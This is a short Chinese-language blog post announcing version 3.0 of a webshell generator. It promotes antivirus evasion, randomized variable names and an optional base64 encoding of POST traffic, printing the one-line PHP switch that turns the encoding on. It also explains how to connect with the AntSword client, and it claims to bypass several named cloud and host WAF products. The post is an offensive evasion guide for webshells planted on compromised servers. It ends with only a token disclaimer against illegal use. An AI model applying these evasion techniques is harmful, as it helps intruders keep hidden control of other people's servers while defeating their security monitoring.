webshell-venom 3.0

前言

2019-7-16 发在土司的文章

1. 修复已知问题:宝塔在遇到header404时会解析到他的404模版上而不是shell上导致无法连接，故去除头部的404，如有需要自行添加

2. 变量全员随机化，不再有固定的变量名称

3. 增加流量传输编码方式并且兼容原版

4. 免杀依旧，自己扫两遍就知道了

看了很多文章甚至包括蚁剑的编码器demo里面都是用一些特定的shell来base64或者hex或者gzin的方式来绕过各种waf的流量检测

但是问题就是不兼容，麻烦，还要上不同的马

并且不好做维护，因为你的特定shell一旦成为已知样本后就相当于完全gg

3.0就解决了这个问题

其实原理很简单，就是如下的一行代码：

1	isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];

如果存在id这个get的参数就把post的数据base64解密一遍

否则就直接传参

也就是说我们只要使用的时候不加id这个参数就能像一般的shell使用

需要过流量检测的时候就加个id=xxx

后面的xxx不固定，也是为了增加随机化

使用实例：

生成测试文件test.php

直接明文post

加入id参数后base64传参

用蚁剑连接的话就用官方的base64_bypass编码器

抓个流量

经过测试把参数全部base64后可以绕过某里云某锁某狗某塔，基本上够用了

如果想要gzin或者hex传输请自己修改

base64只是个参考如果觉得一层不够可以多加几层混淆

这个就需要你自己动手了

禁止用于非法用途！